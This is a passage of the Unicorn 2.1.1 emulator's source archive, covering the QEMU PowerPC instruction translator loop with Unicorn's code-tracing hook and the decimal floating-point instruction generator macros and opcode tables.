GEN_MAC_HANDLER(mulchwu, 0x08, 0x04), GEN_MAC_HANDLER(mulhhw, 0x08, 0x01), GEN_MAC_HANDLER(mulhhwu, 0x08, 0x00), GEN_MAC_HANDLER(mullhw, 0x08, 0x0D), GEN_MAC_HANDLER(mullhwu, 0x08, 0x0C), GEN_HANDLER2_E(tbegin, "tbegin", 0x1F, 0x0E, 0x14, 0x01DFF800, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tend, "tend", 0x1F, 0x0E, 0x15, 0x01FFF800, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tabort, "tabort", 0x1F, 0x0E, 0x1C, 0x03E0F800, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tabortwc, "tabortwc", 0x1F, 0x0E, 0x18, 0x00000000, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tabortwci, "tabortwci", 0x1F, 0x0E, 0x1A, 0x00000000, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tabortdc, "tabortdc", 0x1F, 0x0E, 0x19, 0x00000000, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tabortdci, "tabortdci", 0x1F, 0x0E, 0x1B, 0x00000000, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tsr, "tsr", 0x1F, 0x0E, 0x17, 0x03DFF800, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tcheck, "tcheck", 0x1F, 0x0E, 0x16, 0x007FF800, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(treclaim, "treclaim", 0x1F, 0x0E, 0x1D, 0x03E0F800, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(trechkpt, "trechkpt", 0x1F, 0x0E, 0x1F, 0x03FFF800, \ PPC_NONE, PPC2_TM), #include "translate/fp-ops.inc.c" #include "translate/vmx-ops.inc.c" #include "translate/vsx-ops.inc.c" #include "translate/dfp-ops.inc.c" #include "translate/spe-ops.inc.c" }; #include "helper_regs.h" #include "translate_init.inc.c" static void ppc_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); CPUPPCState *env = cs->env_ptr; int bound; // unicorn setup ctx->uc = cs->uc; ctx->exception = POWERPC_EXCP_NONE; ctx->spr_cb = env->spr_cb; ctx->pr = msr_pr; ctx->mem_idx = env->dmmu_idx; ctx->dr = msr_dr; ctx->hv = msr_hv || !env->has_hv_mode; ctx->insns_flags = env->insns_flags; ctx->insns_flags2 = env->insns_flags2; ctx->access_type = -1; ctx->need_access_type = !(env->mmu_model & POWERPC_MMU_64B); ctx->le_mode = !!(env->hflags & (1 << MSR_LE)); ctx->default_tcg_memop_mask = ctx->le_mode ? MO_LE : MO_BE; ctx->flags = env->flags; #if defined(TARGET_PPC64) ctx->sf_mode = msr_is_64bit(env, env->msr); ctx->has_cfar = !!(env->flags & POWERPC_FLAG_CFAR); #endif ctx->lazy_tlb_flush = env->mmu_model == POWERPC_MMU_32B || env->mmu_model == POWERPC_MMU_601 || (env->mmu_model & POWERPC_MMU_64B); ctx->fpu_enabled = !!msr_fp; if ((env->flags & POWERPC_FLAG_SPE) && msr_spe) { ctx->spe_enabled = !!msr_spe; } else { ctx->spe_enabled = false; } if ((env->flags & POWERPC_FLAG_VRE) && msr_vr) { ctx->altivec_enabled = !!msr_vr; } else { ctx->altivec_enabled = false; } if ((env->flags & POWERPC_FLAG_VSX) && msr_vsx) { ctx->vsx_enabled = !!msr_vsx; } else { ctx->vsx_enabled = false; } #if defined(TARGET_PPC64) if ((env->flags & POWERPC_FLAG_TM) && msr_tm) { ctx->tm_enabled = !!msr_tm; } else { ctx->tm_enabled = false; } #endif ctx->gtse = !!(env->spr[SPR_LPCR] & LPCR_GTSE); if ((env->flags & POWERPC_FLAG_SE) && msr_se) { ctx->singlestep_enabled = CPU_SINGLE_STEP; } else { ctx->singlestep_enabled = 0; } if ((env->flags & POWERPC_FLAG_BE) && msr_be) { ctx->singlestep_enabled |= CPU_BRANCH_STEP; } if ((env->flags & POWERPC_FLAG_DE) && msr_de) { ctx->singlestep_enabled = 0; target_ulong dbcr0 = env->spr[SPR_BOOKE_DBCR0]; if (dbcr0 & DBCR0_ICMP) { ctx->singlestep_enabled |= CPU_SINGLE_STEP; } if (dbcr0 & DBCR0_BRT) { ctx->singlestep_enabled |= CPU_BRANCH_STEP; } } if (unlikely(ctx->base.singlestep_enabled)) { ctx->singlestep_enabled |= GDBSTUB_SINGLE_STEP; } #if defined(DO_SINGLE_STEP) && 0 /* Single step trace mode */ msr_se = 1; #endif #ifdef _MSC_VER bound = (0 - (ctx->base.pc_first | TARGET_PAGE_MASK)) / 4; #else bound = -(ctx->base.pc_first | TARGET_PAGE_MASK) / 4; #endif ctx->base.max_insns = MIN(ctx->base.max_insns, bound); } static void ppc_tr_tb_start(DisasContextBase *db, CPUState *cs) { } static void ppc_tr_insn_start(DisasContextBase *dcbase, CPUState *cs) { TCGContext *tcg_ctx = cs->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, dcbase->pc_next); } static bool ppc_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cs, const CPUBreakpoint *bp) { DisasContext *ctx = container_of(dcbase, DisasContext, base); gen_debug_exception(ctx); dcbase->is_jmp = DISAS_NORETURN; /* * The address covered by the breakpoint must be included in * [tb->pc, tb->pc + tb->size) in order to for it to be properly * cleared -- thus we increment the PC here so that the logic * setting tb->size below does the right thing. */ ctx->base.pc_next += 4; return true; } static void ppc_tr_translate_insn(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); struct uc_struct *uc = ctx->uc; PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = cs->env_ptr; TCGContext *tcg_ctx = ctx->uc->tcg_ctx; opc_handler_t **table, *handler; LOG_DISAS("----------------\n"); LOG_DISAS("nip=" TARGET_FMT_lx " super=%d ir=%d\n", ctx->base.pc_next, ctx->mem_idx, (int)msr_ir); // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, ctx->base.pc_next)) { gen_wait(ctx); return; } // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_CODE, ctx->base.pc_next)) { // Sypc PC in advance gen_update_nip(ctx, ctx->base.pc_next); gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, uc, ctx->base.pc_next); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } ctx->opcode = translator_ldl_swap(tcg_ctx, env, ctx->base.pc_next, need_byteswap(ctx)); LOG_DISAS("translate opcode %08x (%02x %02x %02x %02x) (%s)\n", ctx->opcode, opc1(ctx->opcode), opc2(ctx->opcode), opc3(ctx->opcode), opc4(ctx->opcode), ctx->le_mode ? "little" : "big"); ctx->base.pc_next += 4; table = cpu->opcodes; handler = table[opc1(ctx->opcode)]; if (is_indirect_opcode(handler)) { table = ind_table(handler); handler = table[opc2(ctx->opcode)]; if (is_indirect_opcode(handler)) { table = ind_table(handler); handler = table[opc3(ctx->opcode)]; if (is_indirect_opcode(handler)) { table = ind_table(handler); handler = table[opc4(ctx->opcode)]; } } } /* Is opcode *REALLY* valid ? */ if (unlikely(handler->handler == &gen_invalid)) { qemu_log_mask(LOG_GUEST_ERROR, "invalid/unsupported opcode: " "%02x - %02x - %02x - %02x (%08x) " TARGET_FMT_lx " %d\n", opc1(ctx->opcode), opc2(ctx->opcode), opc3(ctx->opcode), opc4(ctx->opcode), ctx->opcode, ctx->base.pc_next - 4, (int)msr_ir); } else { uint32_t inval; if (unlikely(handler->type & (PPC_SPE | PPC_SPE_SINGLE | PPC_SPE_DOUBLE) && Rc(ctx->opcode))) { inval = handler->inval2; } else { inval = handler->inval1; } if (unlikely((ctx->opcode & inval) != 0)) { qemu_log_mask(LOG_GUEST_ERROR, "invalid bits: %08x for opcode: " "%02x - %02x - %02x - %02x (%08x) " TARGET_FMT_lx "\n", ctx->opcode & inval, opc1(ctx->opcode), opc2(ctx->opcode), opc3(ctx->opcode), opc4(ctx->opcode), ctx->opcode, ctx->base.pc_next - 4); gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); ctx->base.is_jmp = DISAS_NORETURN; return; } } (*(handler->handler))(ctx); #if defined(DO_PPC_STATISTICS) handler->count++; #endif /* Check trace mode exceptions */ if (unlikely(ctx->singlestep_enabled & CPU_SINGLE_STEP && (ctx->base.pc_next <= 0x100 || ctx->base.pc_next > 0xF00) && ctx->exception != POWERPC_SYSCALL && ctx->exception != POWERPC_EXCP_TRAP && ctx->exception != POWERPC_EXCP_BRANCH)) { uint32_t excp = gen_prep_dbgex(ctx); gen_exception_nip(ctx, excp, ctx->base.pc_next); } ctx->base.is_jmp = ctx->exception == POWERPC_EXCP_NONE ? DISAS_NEXT : DISAS_NORETURN; } static void ppc_tr_tb_stop(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = cs->uc->tcg_ctx; if (ctx->exception == POWERPC_EXCP_NONE) { gen_goto_tb(ctx, 0, ctx->base.pc_next); } else if (ctx->exception != POWERPC_EXCP_BRANCH) { if (unlikely(ctx->base.singlestep_enabled)) { gen_debug_exception(ctx); } /* Generate the return instruction */ tcg_gen_exit_tb(tcg_ctx, NULL, 0); } } static const TranslatorOps ppc_tr_ops = { .init_disas_context = ppc_tr_init_disas_context, .tb_start = ppc_tr_tb_start, .insn_start = ppc_tr_insn_start, .breakpoint_check = ppc_tr_breakpoint_check, .translate_insn = ppc_tr_translate_insn, .tb_stop = ppc_tr_tb_stop, }; void gen_intermediate_code(CPUState *cs, TranslationBlock *tb, int max_insns) { DisasContext ctx; memset(&ctx, 0, sizeof(ctx)); translator_loop(&ppc_tr_ops, &ctx.base, cs, tb, max_insns); } void restore_state_to_opc(CPUPPCState *env, TranslationBlock *tb, target_ulong *data) { env->nip = data[0]; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate/������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0020220�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate/dfp-impl.inc.c����������������������������������������������0000664�0000000�0000000�00000024554�14675241067�0022656�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/*** Decimal Floating Point ***/ static inline TCGv_ptr gen_fprp_ptr(TCGContext *tcg_ctx, int reg) { TCGv_ptr r = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, r, tcg_ctx->cpu_env, offsetof(CPUPPCState, vsr[reg].u64[0])); return r; } #define GEN_DFP_T_A_B_Rc(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rd, ra, rb; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ rd = gen_fprp_ptr(tcg_ctx, rD(ctx->opcode)); \ ra = gen_fprp_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_fprp_ptr(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rd, ra, rb); \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_ptr(tcg_ctx, rd); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ } #define GEN_DFP_BF_A_B(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rb; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ ra = gen_fprp_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_fprp_ptr(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, cpu_crf[crfD(ctx->opcode)], \ tcg_ctx->cpu_env, ra, rb); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ } #define GEN_DFP_BF_I_B(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 uim; \ TCGv_ptr rb; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ uim = tcg_const_i32(tcg_ctx, UIMM5(ctx->opcode)); \ rb = gen_fprp_ptr(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, cpu_crf[crfD(ctx->opcode)], \ tcg_ctx->cpu_env, uim, rb); \ tcg_temp_free_i32(tcg_ctx, uim); \ tcg_temp_free_ptr(tcg_ctx, rb); \ } #define GEN_DFP_BF_A_DCM(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra; \ TCGv_i32 dcm; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ ra = gen_fprp_ptr(tcg_ctx, rA(ctx->opcode)); \ dcm = tcg_const_i32(tcg_ctx, DCM(ctx->opcode)); \ gen_helper_##name(tcg_ctx, cpu_crf[crfD(ctx->opcode)], \ tcg_ctx->cpu_env, ra, dcm); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_i32(tcg_ctx, dcm); \ } #define GEN_DFP_T_B_U32_U32_Rc(name, u32f1, u32f2) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rt, rb; \ TCGv_i32 u32_1, u32_2; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ rt = gen_fprp_ptr(tcg_ctx, rD(ctx->opcode)); \ rb = gen_fprp_ptr(tcg_ctx, rB(ctx->opcode)); \ u32_1 = tcg_const_i32(tcg_ctx, u32f1(ctx->opcode)); \ u32_2 = tcg_const_i32(tcg_ctx, u32f2(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rt, rb, u32_1, u32_2); \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_ptr(tcg_ctx, rt); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_i32(tcg_ctx, u32_1); \ tcg_temp_free_i32(tcg_ctx, u32_2); \ } #define GEN_DFP_T_A_B_I32_Rc(name, i32fld) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rt, ra, rb; \ TCGv_i32 i32; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ rt = gen_fprp_ptr(tcg_ctx, rD(ctx->opcode)); \ ra = gen_fprp_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_fprp_ptr(tcg_ctx, rB(ctx->opcode)); \ i32 = tcg_const_i32(tcg_ctx, i32fld(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rt, ra, rb, i32); \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_ptr(tcg_ctx, rt); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_i32(tcg_ctx, i32); \ } #define GEN_DFP_T_B_Rc(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rt, rb; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ rt = gen_fprp_ptr(tcg_ctx, rD(ctx->opcode)); \ rb = gen_fprp_ptr(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rt, rb); \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_ptr(tcg_ctx, rt); \ tcg_temp_free_ptr(tcg_ctx, rb); \ } #define GEN_DFP_T_FPR_I32_Rc(name, fprfld, i32fld) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rt, rs; \ TCGv_i32 i32; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ rt = gen_fprp_ptr(tcg_ctx, rD(ctx->opcode)); \ rs = gen_fprp_ptr(tcg_ctx, fprfld(ctx->opcode)); \ i32 = tcg_const_i32(tcg_ctx, i32fld(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rt, rs, i32); \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_ptr(tcg_ctx, rt); \ tcg_temp_free_ptr(tcg_ctx, rs); \ tcg_temp_free_i32(tcg_ctx, i32); \ } GEN_DFP_T_A_B_Rc(dadd) GEN_DFP_T_A_B_Rc(daddq) GEN_DFP_T_A_B_Rc(dsub) GEN_DFP_T_A_B_Rc(dsubq) GEN_DFP_T_A_B_Rc(dmul) GEN_DFP_T_A_B_Rc(dmulq) GEN_DFP_T_A_B_Rc(ddiv) GEN_DFP_T_A_B_Rc(ddivq) GEN_DFP_BF_A_B(dcmpu) GEN_DFP_BF_A_B(dcmpuq) GEN_DFP_BF_A_B(dcmpo) GEN_DFP_BF_A_B(dcmpoq) GEN_DFP_BF_A_DCM(dtstdc) GEN_DFP_BF_A_DCM(dtstdcq) GEN_DFP_BF_A_DCM(dtstdg) GEN_DFP_BF_A_DCM(dtstdgq) GEN_DFP_BF_A_B(dtstex) GEN_DFP_BF_A_B(dtstexq) GEN_DFP_BF_A_B(dtstsf) GEN_DFP_BF_A_B(dtstsfq) GEN_DFP_BF_I_B(dtstsfi) GEN_DFP_BF_I_B(dtstsfiq) GEN_DFP_T_B_U32_U32_Rc(dquai, SIMM5, RMC) GEN_DFP_T_B_U32_U32_Rc(dquaiq, SIMM5, RMC) GEN_DFP_T_A_B_I32_Rc(dqua, RMC) GEN_DFP_T_A_B_I32_Rc(dquaq, RMC) GEN_DFP_T_A_B_I32_Rc(drrnd, RMC) GEN_DFP_T_A_B_I32_Rc(drrndq, RMC) GEN_DFP_T_B_U32_U32_Rc(drintx, FPW, RMC) GEN_DFP_T_B_U32_U32_Rc(drintxq, FPW, RMC) GEN_DFP_T_B_U32_U32_Rc(drintn, FPW, RMC) GEN_DFP_T_B_U32_U32_Rc(drintnq, FPW, RMC) GEN_DFP_T_B_Rc(dctdp) GEN_DFP_T_B_Rc(dctqpq) GEN_DFP_T_B_Rc(drsp) GEN_DFP_T_B_Rc(drdpq) GEN_DFP_T_B_Rc(dcffix) GEN_DFP_T_B_Rc(dcffixq) GEN_DFP_T_B_Rc(dctfix) GEN_DFP_T_B_Rc(dctfixq) GEN_DFP_T_FPR_I32_Rc(ddedpd, rB, SP) GEN_DFP_T_FPR_I32_Rc(ddedpdq, rB, SP) GEN_DFP_T_FPR_I32_Rc(denbcd, rB, SP) GEN_DFP_T_FPR_I32_Rc(denbcdq, rB, SP) GEN_DFP_T_B_Rc(dxex) GEN_DFP_T_B_Rc(dxexq) GEN_DFP_T_A_B_Rc(diex) GEN_DFP_T_A_B_Rc(diexq) GEN_DFP_T_FPR_I32_Rc(dscli, rA, DCM) GEN_DFP_T_FPR_I32_Rc(dscliq, rA, DCM) GEN_DFP_T_FPR_I32_Rc(dscri, rA, DCM) GEN_DFP_T_FPR_I32_Rc(dscriq, rA, DCM) #undef GEN_DFP_T_A_B_Rc #undef GEN_DFP_BF_A_B #undef GEN_DFP_BF_A_DCM #undef GEN_DFP_T_B_U32_U32_Rc #undef GEN_DFP_T_A_B_I32_Rc #undef GEN_DFP_T_B_Rc #undef GEN_DFP_T_FPR_I32_Rc ����������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate/dfp-ops.inc.c�����������������������������������������������0000664�0000000�0000000�00000013551�14675241067�0022511�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#define _GEN_DFP_LONG(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3B, op1, op2, mask, PPC_NONE, PPC2_DFP) #define _GEN_DFP_LONG_300(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3B, op1, op2, mask, PPC_NONE, PPC2_ISA300) #define _GEN_DFP_LONGx2(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3B, op1, 0x00 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3B, op1, 0x10 | op2, mask, PPC_NONE, PPC2_DFP) #define _GEN_DFP_LONGx4(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3B, op1, 0x00 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3B, op1, 0x08 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3B, op1, 0x10 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3B, op1, 0x18 | op2, mask, PPC_NONE, PPC2_DFP) #define _GEN_DFP_QUAD(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3F, op1, op2, mask, PPC_NONE, PPC2_DFP) #define _GEN_DFP_QUAD_300(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3F, op1, op2, mask, PPC_NONE, PPC2_ISA300) #define _GEN_DFP_QUADx2(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3F, op1, 0x00 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3F, op1, 0x10 | op2, mask, PPC_NONE, PPC2_DFP) #define _GEN_DFP_QUADx4(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3F, op1, 0x00 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3F, op1, 0x08 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3F, op1, 0x10 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3F, op1, 0x18 | op2, mask, PPC_NONE, PPC2_DFP) #define GEN_DFP_T_A_B_Rc(name, op1, op2) \ _GEN_DFP_LONG(name, op1, op2, 0x00000000) #define GEN_DFP_Tp_Ap_Bp_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x00210800) #define GEN_DFP_Tp_A_Bp_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x00200800) #define GEN_DFP_T_B_Rc(name, op1, op2) \ _GEN_DFP_LONG(name, op1, op2, 0x001F0000) #define GEN_DFP_Tp_Bp_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x003F0800) #define GEN_DFP_Tp_B_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x003F0000) #define GEN_DFP_T_Bp_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x001F0800) #define GEN_DFP_BF_A_B(name, op1, op2) \ _GEN_DFP_LONG(name, op1, op2, 0x00000001) #define GEN_DFP_BF_A_B_300(name, op1, op2) \ _GEN_DFP_LONG_300(name, op1, op2, 0x00400001) #define GEN_DFP_BF_Ap_Bp(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x00610801) #define GEN_DFP_BF_A_Bp(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x00600801) #define GEN_DFP_BF_A_Bp_300(name, op1, op2) \ _GEN_DFP_QUAD_300(name, op1, op2, 0x00400001) #define GEN_DFP_BF_A_DCM(name, op1, op2) \ _GEN_DFP_LONGx2(name, op1, op2, 0x00600001) #define GEN_DFP_BF_Ap_DCM(name, op1, op2) \ _GEN_DFP_QUADx2(name, op1, op2, 0x00610001) #define GEN_DFP_T_A_B_RMC_Rc(name, op1, op2) \ _GEN_DFP_LONGx4(name, op1, op2, 0x00000000) #define GEN_DFP_Tp_Ap_Bp_RMC_Rc(name, op1, op2) \ _GEN_DFP_QUADx4(name, op1, op2, 0x02010800) #define GEN_DFP_Tp_A_Bp_RMC_Rc(name, op1, op2) \ _GEN_DFP_QUADx4(name, op1, op2, 0x02000800) #define GEN_DFP_TE_T_B_RMC_Rc(name, op1, op2) \ _GEN_DFP_LONGx4(name, op1, op2, 0x00000000) #define GEN_DFP_TE_Tp_Bp_RMC_Rc(name, op1, op2) \ _GEN_DFP_QUADx4(name, op1, op2, 0x00200800) #define GEN_DFP_R_T_B_RMC_Rc(name, op1, op2) \ _GEN_DFP_LONGx4(name, op1, op2, 0x001E0000) #define GEN_DFP_R_Tp_Bp_RMC_Rc(name, op1, op2) \ _GEN_DFP_QUADx4(name, op1, op2, 0x003E0800) #define GEN_DFP_SP_T_B_Rc(name, op1, op2) \ _GEN_DFP_LONG(name, op1, op2, 0x00070000) #define GEN_DFP_SP_Tp_Bp_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x00270800) #define GEN_DFP_S_T_B_Rc(name, op1, op2) \ _GEN_DFP_LONG(name, op1, op2, 0x000F0000) #define GEN_DFP_S_Tp_Bp_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x002F0800) #define GEN_DFP_T_A_SH_Rc(name, op1, op2) \ _GEN_DFP_LONGx2(name, op1, op2, 0x00000000) #define GEN_DFP_Tp_Ap_SH_Rc(name, op1, op2) \ _GEN_DFP_QUADx2(name, op1, op2, 0x00210000) GEN_DFP_T_A_B_Rc(dadd, 0x02, 0x00), GEN_DFP_Tp_Ap_Bp_Rc(daddq, 0x02, 0x00), GEN_DFP_T_A_B_Rc(dsub, 0x02, 0x10), GEN_DFP_Tp_Ap_Bp_Rc(dsubq, 0x02, 0x10), GEN_DFP_T_A_B_Rc(dmul, 0x02, 0x01), GEN_DFP_Tp_Ap_Bp_Rc(dmulq, 0x02, 0x01), GEN_DFP_T_A_B_Rc(ddiv, 0x02, 0x11), GEN_DFP_Tp_Ap_Bp_Rc(ddivq, 0x02, 0x11), GEN_DFP_BF_A_B(dcmpu, 0x02, 0x14), GEN_DFP_BF_Ap_Bp(dcmpuq, 0x02, 0x14), GEN_DFP_BF_A_B(dcmpo, 0x02, 0x04), GEN_DFP_BF_Ap_Bp(dcmpoq, 0x02, 0x04), GEN_DFP_BF_A_DCM(dtstdc, 0x02, 0x06), GEN_DFP_BF_Ap_DCM(dtstdcq, 0x02, 0x06), GEN_DFP_BF_A_DCM(dtstdg, 0x02, 0x07), GEN_DFP_BF_Ap_DCM(dtstdgq, 0x02, 0x07), GEN_DFP_BF_A_B(dtstex, 0x02, 0x05), GEN_DFP_BF_Ap_Bp(dtstexq, 0x02, 0x05), GEN_DFP_BF_A_B(dtstsf, 0x02, 0x15), GEN_DFP_BF_A_Bp(dtstsfq, 0x02, 0x15), GEN_DFP_BF_A_B_300(dtstsfi, 0x03, 0x15), GEN_DFP_BF_A_Bp_300(dtstsfiq, 0x03, 0x15), GEN_DFP_TE_T_B_RMC_Rc(dquai, 0x03, 0x02), GEN_DFP_TE_Tp_Bp_RMC_Rc(dquaiq, 0x03, 0x02), GEN_DFP_T_A_B_RMC_Rc(dqua, 0x03, 0x00), GEN_DFP_Tp_Ap_Bp_RMC_Rc(dquaq, 0x03, 0x00), GEN_DFP_T_A_B_RMC_Rc(drrnd, 0x03, 0x01), GEN_DFP_Tp_A_Bp_RMC_Rc(drrndq, 0x03, 0x01), GEN_DFP_R_T_B_RMC_Rc(drintx, 0x03, 0x03), GEN_DFP_R_Tp_Bp_RMC_Rc(drintxq, 0x03, 0x03), GEN_DFP_R_T_B_RMC_Rc(drintn, 0x03, 0x07), GEN_DFP_R_Tp_Bp_RMC_Rc(drintnq, 0x03, 0x07), GEN_DFP_T_B_Rc(dctdp, 0x02, 0x08), GEN_DFP_Tp_B_Rc(dctqpq, 0x02, 0x08), GEN_DFP_T_B_Rc(drsp, 0x02, 0x18), GEN_DFP_Tp_Bp_Rc(drdpq, 0x02, 0x18), GEN_DFP_T_B_Rc(dcffix, 0x02, 0x19), GEN_DFP_Tp_B_Rc(dcffixq, 0x02, 0x19), GEN_DFP_T_B_Rc(dctfix, 0x02, 0x09), GEN_DFP_T_Bp_Rc(dctfixq, 0x02, 0x09), GEN_DFP_SP_T_B_Rc(ddedpd, 0x02, 0x0a), GEN_DFP_SP_Tp_Bp_Rc(ddedpdq, 0x02, 0x0a), GEN_DFP_S_T_B_Rc(denbcd, 0x02, 0x1a), 